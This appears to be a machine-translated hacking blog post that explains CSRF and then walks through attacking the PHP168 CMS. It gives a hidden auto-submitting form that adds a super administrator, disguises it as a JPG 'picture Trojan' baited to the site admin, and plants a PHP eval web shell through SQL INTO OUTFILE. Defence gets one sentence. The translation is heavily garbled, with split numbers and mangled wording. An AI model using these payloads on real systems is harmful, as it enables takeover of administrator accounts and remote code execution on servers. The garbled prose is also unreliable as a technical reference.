CSRF is Cross Site Request Forgery abbreviation, the Chinese meaning is cross-site request forgery, it was written as XSRF。 Hack Forge of the target user's HTTP request, then the HTTP request sent to a CSRF vulnerability in the web site. There is a CSRF vulnerability of the site to perform a forged HTTP request, it sparked a cross-site request forgery attacks. Hackers use email messages or pictures hidden in the HTTP connection, so that the target user in the note, click this link. Since the HTTP link is by the target user's own sent, and the target user is with the specific permission of the legitimate user, therefore, there is a CSRF vulnerability in the website will this request as a normal HTTP request and execute it. For example, you access the shopping site URL is: [http://www.hacklu.net](), you buy a product, the shopping site parameters: [http://www.hacklu.net/buy.php?item=camera&quantity=1](), which is a normal HTTP request, the Product name is Cameras camera, Buy The number is 1, the site will be the Buy of the merchandise with the number recorded in the user's account. If a hacker knows[http://www.hacklu.net]()of the shopping site operation process, he can forge a similar to HTTP request: [http://www.hacklu.net/buy.php?item=camera&quantity=1 0 0 0](), the commodity name is the camera, while the purchase quantity is 1 0 0 0 it. If the target user is in the site login accidentally visit this link, then in his account is a record is the purchase 1 0 0 0 table the camera. Cross-site request forgery attack steps as shown in Figure 1. [! [Click in the new window, browse this picture](http://www.hacklu.net/blog/attachment.php?fid=186)]() In fact, this technology abroad 2 0 0 0 time of year have been proposed, and in domestic has not been valued, we may think that this is just Masturbation type of vulnerability. Generally CSRF with[XSS]()is better, if there is no[XSS]()case, with social workers is also good. Below I to PHP168 whole Station system the latest version, for example. PHP168 after many UPS and downs in the[XSS]()and SQL Injection aspects are more stringent. This time I use a CSRF attack to add the administrator. Add administrator page is: [http://192.168.0.3/php168/admin/index.php?lfj=member&job=addmember](), as shown in Figure 2. [! [Click in the new window, browse this picture](http://www.hacklu.net/blog/attachment.php?fid=187)]() We look at the code is how to write, as follows: <form name="form1" method="post" action="index. php? lfj=member&action=addmember"> <tr class="head"> <td colspan="2">adding new user</td> </tr> <tr bgcolor="#FFFFFF"> <td width="3 7%">account:</td> <td width="6 3%"> <input type="text" name="postdb[username]"> </td> </tr> <tr bgcolor="#FFFFFF"> <td width="3 7%">password:</td> <td width="6 3%"> <input type="password" name="postdb[passwd]"> </td> </tr> <tr bgcolor="#FFFFFF"> <td width="3 7%">repeat password:</td> <td width="6 3%"> <input type="password" name="postdb[passwd2]"> </td> </tr> <tr bgcolor="#FFFFFF"> <td width="3 7%">belongs to a user group:<span help=1>only the super administrator and create a talent can add a new super administrator,only the super administrator and the founder and front Desk administrator to add a new front Desk administrator</span></td> <td width="6 3%"> <select name='postdb[groupid]' ><option value=" selected>existing user group</option> <option value='2' >visitors to the group</option> <option value='3' >Super administrator</option> <option value='4' >front Desk administrator</option> < option value=">\--+the above is a system group, the following are members of the group+--</option> <option value='8' >ordinary members</option> <option value='9' >senior member</option> </select> </td> </tr> <tr bgcolor="#FFFFFF"> <td width="3 7%">email:</td> <td width="6 3%"> <input type="text" name="postdb[email]"> </td> </tr> <tr bgcolor="#FFFFFF"> <td width="3 7%"> </td> <td width="6 3%"> <input type="submit" name="Submit" value="submit"> </td> </tr> </form> The above as long as the account, password, confirm password, and belongs to user group a few on OK, the modified complete code is as follows: <html> <body > <form name="form1" method="post" action="[http://192.168.0.3/php168/admin/index.php?lfj=member&action=addmember">](>) <input type="hidden" name="postdb[username]" value='cherry prodigal son'> <input type="hidden" name="postdb[passwd]" value='nohack'> <input type="hidden" name="postdb[passwd2]" value='nohack'> <select name='postdb[groupid]' ><option value='3' selected> </form> </body> </html> We are in the website home page to register a user, and then in the members centre to create an album, where you can pass the HTML file, if you can not upload the Save to jpg format to upload can also, because IE6 under JPG format as long as it contains HTML code can also be executed, as shown in Figure 3, so we give the path:so that the administrator in the log on the front and back of the case to access this page will add a user named“cherry blossom prodigal son”, password is“nohack”Super administrator, but so will display the Add administrators to the success of the prompt, as shown in Figure 4. We're going to do hidden point, to make a picture of the Trojan, the code is as follows: [! [Click in the new window, browse this picture](http://www.hacklu.net/blog/attachment.php?fid=188)]() [! [Click in the new window, browse this picture](http://www.hacklu.net/blog/attachment.php?fid=189)]() <html> <body> <iframe src=http://192.168.0.3/php168/upload_files/special/5_20090425170444_eA==.htm width=0 height=0></iframe> <img src=/Article/UploadPic/2010-4/2 0 1 0 4 1 7 1 4 4 0 2 2 6 0 0. jpg></img> </body> <html> Put this saved as JPG format in the Create album in uploaded, 得到路径为special/5_20090426220451_PYwLh.jpg as shown in Figure 5, so that we go access to messages place message, putsent to the administrator as long as the Sign in the foreground and the background of the case visit this link it will execute the above code, and the administrator saw just the one picture, as shown in Figure 6, Figure 7 shown. [! [Click in the new window, browse this picture](http://www.hacklu.net/blog/attachment.php?fid=190)]() [! [Click in the new window, browse this picture](http://www.hacklu.net/blog/attachment.php?fid=191)]() [! [Click in the new window, browse this picture](http://www.hacklu.net/blog/attachment.php?fid=192)]() And in the background has been added to the user name is: Sakura prodigal son of the super administrator user, as shown in Figure 8. On into the back to get the SHELL method is very much, I used here is in database management there to execute the SQL statement executed:“SELECT '<? php @eval($_POST[cmd]);?& gt;' into outfile 'C:\\\AppServ\\\www\\\php168\\\nohack.php'”, pay attention to WIN the following“\\\”, the WEB path may be in the management of the home see. As shown in Figure 9 and 1 0 shown in Fig. [! [Click in the new window, browse this picture](http://www.hacklu.net/blog/attachment.php?fid=193)]()[! [Click in the new window, browse this picture](http://www.hacklu.net/blog/attachment.php?fid=194)]()[! [Click in the new window, browse this picture](http://www.hacklu.net/blog/attachment.php?fid=195)]() Common prevention methods are generally, check the page source, check the built-in hidden variables using the POST, and so on. Space is limited for each approach I will not bore you with a child. In addition to care for Rookie of the friends I made animations, find me the discussion can go on non-secure or even BLOG.